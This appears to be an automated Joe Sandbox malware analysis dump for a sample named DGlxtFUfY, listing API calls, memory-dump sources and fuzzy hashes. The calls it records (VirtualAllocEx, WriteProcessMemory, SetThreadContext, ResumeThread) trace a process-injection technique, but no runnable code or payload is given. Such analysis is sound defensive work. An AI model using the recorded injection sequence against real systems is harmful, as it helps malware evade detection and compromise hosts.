• Instruction Fuzzy Hash: C6917E71D00219DFDB50DFA8C841BEDBBB2FF48314F1485AAE848A7290DB749985CF91

Control-flow Graph: function blocks d0ae28-d0b0a8 (rendered graph residue; node list omitted, API calls listed below)
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 00D0B07E
Memory Dump Source
• Source File: 0000000A.00000002.2036586408.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_d00000_DGlxtFUfY.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 72588114a5f8483965fadf37eb860e0aa4302f2d90c331136473002e3a694d61
• Instruction ID: 907ec3c6f0ec0e91ac01c156ec6d5025afe43a2b27b09acfaa6c565fec108582
• Opcode Fuzzy Hash: 72588114a5f8483965fadf37eb860e0aa4302f2d90c331136473002e3a694d61
• Instruction Fuzzy Hash: 01814670A00B058FD724DF29D44575ABBF1FF48304F14892EE48AD7A90D775E849CBA1

Control-flow Graph: function blocks d0590c-d05a61 (rendered graph residue; node list omitted, API calls listed below)
APIs
• CreateActCtxA.KERNEL32(?), ref: 00D059C9
Memory Dump Source
• Source File: 0000000A.00000002.2036586408.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_d00000_DGlxtFUfY.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: a5f93928980782070f7866b287fc79ee6d85bdb9ac23c5b5477a1523816842a4
• Instruction ID: 3b717cef957f5fe8e191803ca72131d6f40e9572f1ee64b2c96de07e033ecea3
• Opcode Fuzzy Hash: a5f93928980782070f7866b287fc79ee6d85bdb9ac23c5b5477a1523816842a4
• Instruction Fuzzy Hash: ED4125B0C00719CFDB24CFAAD88479EBBF5BF48314F24805AD408AB255DB756945CFA0

Control-flow Graph: function blocks d044b0-d05a61 (rendered graph residue; node list omitted, API calls listed below)
APIs
• CreateActCtxA.KERNEL32(?), ref: 00D059C9
Memory Dump Source
• Source File: 0000000A.00000002.2036586408.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_d00000_DGlxtFUfY.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 1aa009014d2c907bf7c3978b16d92123957555c4422cb72b14d61f718c76d053
• Instruction ID: 399f777e8d4bf967b6b0fad01b44f38ececa7769c61cecf7b276dbabf48e28fd
• Opcode Fuzzy Hash: 1aa009014d2c907bf7c3978b16d92123957555c4422cb72b14d61f718c76d053
• Instruction Fuzzy Hash: A941F2B0D00619DFDB24CFAAD884B8EBBB5BF48304F24806AD408AB255DB756945CFA0

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 836 6c43f90-6c43fe4 838 6c43fe6-6c43fec 836->838 839 6c43fef-6c43ffe 836->839 838->839 840 6c44000 839->840 841 6c44003-6c4403c DrawTextExW 839->841 840->841 842 6c44045-6c44062 841->842 843 6c4403e-6c44044 841->843 843->842
                                                                                                                                                APIs
                                                                                                                                                • DrawTextExW.USER32(?,?,?,?,?,?), ref: 06C4402F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2043939919.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6c40000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DrawText
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2175133113-0
                                                                                                                                                • Opcode ID: 1a0346130a15d61e2fc20f5d6ebd634a47926caf5767c69a673cb2ea8de742dc
                                                                                                                                                • Instruction ID: 9d116bb204756ed2c1094e69a914409fcef58fb45ec872e12702f1d4e244f572
                                                                                                                                                • Opcode Fuzzy Hash: 1a0346130a15d61e2fc20f5d6ebd634a47926caf5767c69a673cb2ea8de742dc
                                                                                                                                                • Instruction Fuzzy Hash: 553100B5D012499FCB10DF9AD884ADEFBF4FB48320F24842AE818A7310D374A940CFA0

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 846 6dd7199-6dd71ee 849 6dd71fe-6dd723d WriteProcessMemory 846->849 850 6dd71f0-6dd71fc 846->850 852 6dd723f-6dd7245 849->852 853 6dd7246-6dd7276 849->853 850->849 852->853
                                                                                                                                                APIs
                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06DD7230
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                • Opcode ID: 20ab314b90c79ca8b22d78b4a19e2b04da1b4441db07494bb72bf72253157ca7
                                                                                                                                                • Instruction ID: 4d6b41c94a787816286feb4821c7f9a9a8cbf6bbb027bc3982b1c168bab5f60c
                                                                                                                                                • Opcode Fuzzy Hash: 20ab314b90c79ca8b22d78b4a19e2b04da1b4441db07494bb72bf72253157ca7
                                                                                                                                                • Instruction Fuzzy Hash: 752117B1900359DFCB10DFAAC985BDEBBF5FF48314F10842AE998A7251C774A944CBA4

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 857 6c47bb1-6c47c0c 861 6c47c72-6c47c8d 857->861 862 6c47c0e-6c47c50 MonitorFromPoint 857->862 870 6c47c8f-6c47c9c 861->870 865 6c47c52-6c47c58 862->865 866 6c47c59-6c47c67 call 6c47d79 862->866 865->866 869 6c47c6d-6c47c70 866->869 869->870
                                                                                                                                                APIs
                                                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 06C47C3F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2043939919.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6c40000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FromMonitorPoint
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1566494148-0
                                                                                                                                                • Opcode ID: 8babbee786cb9640f3989a218f3297a28a7fe20df0d63ff8d5bef0c0a8d7e94b
                                                                                                                                                • Instruction ID: 33fe80eba1102d851f15f6fd22a01ca6d3a6971b9083b82f2920cbd493c33f45
                                                                                                                                                • Opcode Fuzzy Hash: 8babbee786cb9640f3989a218f3297a28a7fe20df0d63ff8d5bef0c0a8d7e94b
                                                                                                                                                • Instruction Fuzzy Hash: 232146B1D002589FCB11EF99D844BEEBFB4EB09321F14849AE895AB341C7346A44CFA0
                                                                                                                                                APIs
                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06DD7230
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                • Opcode ID: 72fbe2b3980980c70040495aff9e43d49318f92cb864f1ee9c887e5e41291377
                                                                                                                                                • Instruction ID: 1f4d8910a07f76ce73870d85de99e2de74a70164fe7788248f58e8888b77c612
                                                                                                                                                • Opcode Fuzzy Hash: 72fbe2b3980980c70040495aff9e43d49318f92cb864f1ee9c887e5e41291377
                                                                                                                                                • Instruction Fuzzy Hash: 002126B19003599FCB10DFAAC885BDEBBF5FF48314F10842AE958A7250C778A944CBA4
                                                                                                                                                APIs
                                                                                                                                                • DrawTextExW.USER32(?,?,?,?,?,?), ref: 06C4402F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2043939919.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6c40000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DrawText
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2175133113-0
                                                                                                                                                • Opcode ID: 3f0e2f7cf8e44308075e87ec36d5327445513d296c05372314a86fbf7ab773c4
                                                                                                                                                • Instruction ID: 945988bc409042591085fcbc72ab5d6cdeb6937ff584db77c316c4c077010f2e
                                                                                                                                                • Opcode Fuzzy Hash: 3f0e2f7cf8e44308075e87ec36d5327445513d296c05372314a86fbf7ab773c4
                                                                                                                                                • Instruction Fuzzy Hash: 8321CEB5D002499FDB10DF9AD884A9EFBF5FB58320F24842AE919A7210D775A944CFA0
                                                                                                                                                APIs
                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06DD7310
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                • Opcode ID: 791a49643544d7268ef04757927bd741bb04b41f477db90e7a97709327344508
                                                                                                                                                • Instruction ID: d58cf951722d8fe8891d8849afad6bc027d6b63fda3b044efc7c8be6b0201c93
                                                                                                                                                • Opcode Fuzzy Hash: 791a49643544d7268ef04757927bd741bb04b41f477db90e7a97709327344508
                                                                                                                                                • Instruction Fuzzy Hash: 4A2127B19003499FCB10DFAAD881ADEFBF5FF48320F508429E998A7250C7349550DBA5
                                                                                                                                                APIs
                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06DD7086
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                • Opcode ID: 6e4207808172d85b30382b371cf59e39267070a2b27a38a23663b080eca37954
                                                                                                                                                • Instruction ID: 92f062898dca015a9c11b9824d267cb32394841404f56967c064eccc9bf10264
                                                                                                                                                • Opcode Fuzzy Hash: 6e4207808172d85b30382b371cf59e39267070a2b27a38a23663b080eca37954
                                                                                                                                                • Instruction Fuzzy Hash: 3A2139B1D002098FCB10DFAAC4857EEBBF4AF48324F148429D458A7281C778A945CBA4
                                                                                                                                                APIs
                                                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 06C47C3F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2043939919.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6c40000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FromMonitorPoint
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1566494148-0
                                                                                                                                                • Opcode ID: 3c9ed0ca83358d7e9b81de55a769a6da24e043cb97c1e66d8b3b94a311910eb0
                                                                                                                                                • Instruction ID: 319efaae40243c232f8bca89a181824e50b8f27212553255fe9280565057be43
                                                                                                                                                • Opcode Fuzzy Hash: 3c9ed0ca83358d7e9b81de55a769a6da24e043cb97c1e66d8b3b94a311910eb0
                                                                                                                                                • Instruction Fuzzy Hash: 15215AB1E002088FCB10EF9AD405BEEFBF5EB45321F14805AE955A7380C7356944CFA0
                                                                                                                                                APIs
                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06DD7310
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                • Opcode ID: 70b26ba237f10d77cf50edc42209dfaf0d91fa409ee26a823684f4376628e21e
                                                                                                                                                • Instruction ID: f6b2921e6b90c7279425aa9363144bd2958da3cfbfde3781dae5b0daba801f8e
                                                                                                                                                • Opcode Fuzzy Hash: 70b26ba237f10d77cf50edc42209dfaf0d91fa409ee26a823684f4376628e21e
                                                                                                                                                • Instruction Fuzzy Hash: 972128B1D002599FCB10DFAAC880ADEFBF5FF48320F50842AE958A7250C7349944DBA4
                                                                                                                                                APIs
                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06DD7086
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                • Opcode ID: 592dfe1a6f622aa497ce56c6e3c8ff19e9cacec580f17aa944fbfd145d156b8c
• Instruction ID: f02cb839465f3a8385eed72387ca4d991feff66a4acbf08c7142399d95f3551c
• Opcode Fuzzy Hash: 592dfe1a6f622aa497ce56c6e3c8ff19e9cacec580f17aa944fbfd145d156b8c
• Instruction Fuzzy Hash: B72137B1D002098FDB10DFAAC4857EEBBF4AB48364F14842AD459A7240C779A944CFA4
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D0D797
Memory Dump Source
• Source File: 0000000A.00000002.2036586408.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_d00000_DGlxtFUfY.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 060e7672c800eaaa55f97ea57aa326f080e98d830d3d957e1d5fb537f5ef7968
• Instruction ID: 10d8e8e8c4a9723f14e0973c23a1eda4cb23a39940be2e09bd0df3ec315a2482
• Opcode Fuzzy Hash: 060e7672c800eaaa55f97ea57aa326f080e98d830d3d957e1d5fb537f5ef7968
• Instruction Fuzzy Hash: BA21C2B5900258DFDB10CFAAD984ADEFFF9EB48320F14841AE958A7350D374A944CFA5
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D0D797
Memory Dump Source
• Source File: 0000000A.00000002.2036586408.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_d00000_DGlxtFUfY.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: c7763c7bc05a6bd63a6c4e7e3ae754744771fcd48e7e554f80828f2b6285b752
• Instruction ID: 13fd2458443187792dadfeaddd94208d9ab96687f2ef04d6c576320bff02446d
• Opcode Fuzzy Hash: c7763c7bc05a6bd63a6c4e7e3ae754744771fcd48e7e554f80828f2b6285b752
• Instruction Fuzzy Hash: 3021E0B5900218DFDB10CFAAD584ADEBBF5EB48324F14841AE958A7360C374A944CF60
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06DD714E
Memory Dump Source
• Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: f3e754d994f2df767fc5614d3e2b83983c45c33f1b869c88abe145b2e707907f
• Instruction ID: 5d402c4c8b63d0dd919f83e9835d6140a1930abc7c781281f7b8fa8b5bfa2f2a
• Opcode Fuzzy Hash: f3e754d994f2df767fc5614d3e2b83983c45c33f1b869c88abe145b2e707907f
• Instruction Fuzzy Hash: D21147B59002499FCB10DFAAC845BDFBFF5EF48324F208419E959A7250CB75A940CFA5
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 03e5296b97652b0ceaed0b33dd7746d9a583a27710c19c52ec5baeef8ccd514b
• Instruction ID: 5f9b83c19ff67fddc43731cef45d350cd7fe7d6c9704aca70e5086dcfdcbb1b1
• Opcode Fuzzy Hash: 03e5296b97652b0ceaed0b33dd7746d9a583a27710c19c52ec5baeef8ccd514b
• Instruction Fuzzy Hash: 081149B19002488FCB20DFAAC4457DEFBF4EF88324F208829D459A7250CB35A544CF94
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06DD714E
Memory Dump Source
• Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 001f7f0757e50d73d0e12b4429dd3cfaf6a0110712ac3e6db92ae00b56502bf0
• Instruction ID: 2a28f1bee313dc1ef5b9bd3eee6216daf1078461d509e04304e88673a638c286
• Opcode Fuzzy Hash: 001f7f0757e50d73d0e12b4429dd3cfaf6a0110712ac3e6db92ae00b56502bf0
• Instruction Fuzzy Hash: 371126B19002499FCB10DFAAC844BDEBFF5EB88324F148419E559A7250C775A944CFA4
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 06DDAF1D
Memory Dump Source
• Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: 4b5a27521dcbb74563d1638edd0d27a9d4355355573888dc418712fe46ec536e
• Instruction ID: 25762997768527faca7748e137864da21c6dfc394885fb461a53adf5e0422149
• Opcode Fuzzy Hash: 4b5a27521dcbb74563d1638edd0d27a9d4355355573888dc418712fe46ec536e
• Instruction Fuzzy Hash: 1011F5B5800349DFCB10DF9AD485BDEFBF8EB48324F14885AE994A7210C375A544CFA5
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: ba5d2546bb596789d844d3db80172deb0ad39677f7894d06c77eccfd41295e4f
• Instruction ID: 4e8d4e11e5187102673875836223218d97cc470c8716ebcbe76df4150243f05b
• Opcode Fuzzy Hash: ba5d2546bb596789d844d3db80172deb0ad39677f7894d06c77eccfd41295e4f
• Instruction Fuzzy Hash: A31136B1D002488FCB20DFAAC8457DEFBF5EB88324F24842AD559A7250CB75A944CFA4
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 06DDAF1D
Memory Dump Source
• Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: b60f2d7b8d163e438ec1539d893188268117953c6f787a0b1be93964899c2913
• Instruction ID: 0b7ec59ee7fa1e66410a5c8cfe887b4c51573a89c88c6c4c805998be938b30f6
• Opcode Fuzzy Hash: b60f2d7b8d163e438ec1539d893188268117953c6f787a0b1be93964899c2913
• Instruction Fuzzy Hash: 361103B5900348DFDB50DF9AD884BDEFBF8EB48320F14845AE958A7210C375A944CFA5
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 00D0B07E
Memory Dump Source
• Source File: 0000000A.00000002.2036586408.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_d00000_DGlxtFUfY.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 60c2940d78a05dc0d1b03f93af6dcb581585834c27ad374e4996a7c881b6b6fa
• Instruction ID: 917f82b3f407fe927589c4ffa01be5843a12a09d93a003d06435c8649817bcb3
• Opcode Fuzzy Hash: 60c2940d78a05dc0d1b03f93af6dcb581585834c27ad374e4996a7c881b6b6fa
• Instruction Fuzzy Hash: 951110B5C003498FCB20CF9AD444BDEFBF4EB88324F14842AD468A7250D379A545CFA1
Memory Dump Source
• Source File: 0000000A.00000002.2036188864.0000000000B5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B5D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_b5d000_DGlxtFUfY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6bc111b1a1e41b1bbdcc713c3d2f13b5a936720d176b63275a28408567a611cc
• Instruction ID: 84d23c6fb8c274ecde15cb1cf46a1cd3330df293ffccd9360b43e828099545e7
• Opcode Fuzzy Hash: 6bc111b1a1e41b1bbdcc713c3d2f13b5a936720d176b63275a28408567a611cc
• Instruction Fuzzy Hash: 80212871500204DFDB15DF14D9C0B26BFA5FB94315F20C6E9DD094B356C336E85ACAA2
Memory Dump Source
• Source File: 0000000A.00000002.2036337905.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_b6d000_DGlxtFUfY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d7c062dcb78c55b78641b1bba7ee9c0f1ad3640d7863db6ccfaaeaa71cc7c36d
• Instruction ID: bbe4947f576c9f741330fb9b4a270082eeaa2a5cf4e7656507b4b495d5b14704
• Opcode Fuzzy Hash: d7c062dcb78c55b78641b1bba7ee9c0f1ad3640d7863db6ccfaaeaa71cc7c36d
• Instruction Fuzzy Hash: 1D212671B04200EFDB05DF14D9D0B26BBE5FB88314F24C6ADE8094B296C33AD846CA61
Memory Dump Source
• Source File: 0000000A.00000002.2036337905.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_b6d000_DGlxtFUfY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e951f6c12f3df9b44bc0408da32feb3fbeca417960ad2ecce6878b8e41c20573
• Instruction ID: c2bad1aaeea3e03c879a4d0fc1082015bd202c7d380aa12332b359d5ad8f1712
• Opcode Fuzzy Hash: e951f6c12f3df9b44bc0408da32feb3fbeca417960ad2ecce6878b8e41c20573
• Instruction Fuzzy Hash: F5210475A04240DFCB14DF14D9D4B26BFA5FB88314F24C5ADE90A4B296C33BD847CAA1
Memory Dump Source
• Source File: 0000000A.00000002.2036337905.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_b6d000_DGlxtFUfY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6cbc84a2219a5c2c3838b2660958e28eaff3efa6579793a258c70d3279291648
• Instruction ID: c589b65231e00a78cb9947609e976e77645f2d166a2a967d8dfe7023da2c8164
• Opcode Fuzzy Hash: 6cbc84a2219a5c2c3838b2660958e28eaff3efa6579793a258c70d3279291648
• Instruction Fuzzy Hash: BF2184755083809FDB02CF14D994B11BFB1FB56314F28C5DAD8498F2A7C33A985ACB62
Memory Dump Source
• Source File: 0000000A.00000002.2036188864.0000000000B5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B5D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_b5d000_DGlxtFUfY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
• Instruction ID: 8da9cef36c84af1edd46f5655858c0c2c73c8e6a7ee7529a9d6add7bd554e161
• Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                • Instruction Fuzzy Hash: 4811CD72504240CFDB16CF00D5C4B16BFA2FB94324F24C2E9DD090A256C33AE85ACBA1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2036337905.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_b6d000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                • Instruction ID: 49cb53afbdab6e5e606156f86fd72f963bc6415acd62360bdd785a61e3fe8766
                                                                                                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                • Instruction Fuzzy Hash: 07118B75A04280DFDB16CF14D5D4B15BBA1FB84314F28C6AAD8494B696C33AD84ACB61
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2036188864.0000000000B5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B5D000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_b5d000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 4ae3031b3dfd620ddd067b5806df9ef25669c023916de20b34aa6f8193fd16a3
                                                                                                                                                • Instruction ID: 6d3e0b79ebb6a799b07844ca694e23f6a582c28b2f3c722920b97b51daadbb4d
                                                                                                                                                • Opcode Fuzzy Hash: 4ae3031b3dfd620ddd067b5806df9ef25669c023916de20b34aa6f8193fd16a3
                                                                                                                                                • Instruction Fuzzy Hash: 7E01F7711083409AE7208B25CDC4B67BFD8DF49326F18C6EAED080A286D6799C49CA71
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2036188864.0000000000B5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B5D000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_b5d000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: a7aa3b5c08d70efd2401742c92cf924e5a898f19050e62645c0412a0284b0743
                                                                                                                                                • Instruction ID: 91afcd5fc01951549d48443c5de77fcc39b371671a3b5c2aa978f1430a66009e
                                                                                                                                                • Opcode Fuzzy Hash: a7aa3b5c08d70efd2401742c92cf924e5a898f19050e62645c0412a0284b0743
                                                                                                                                                • Instruction Fuzzy Hash: F1F062714043449EE7208F16C8C8B62FFE8EB55735F18C59AED084B286C2799C44CAB1

Execution Graph

Execution Coverage: 2.7%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 1659
Total number of Limit Nodes: 5
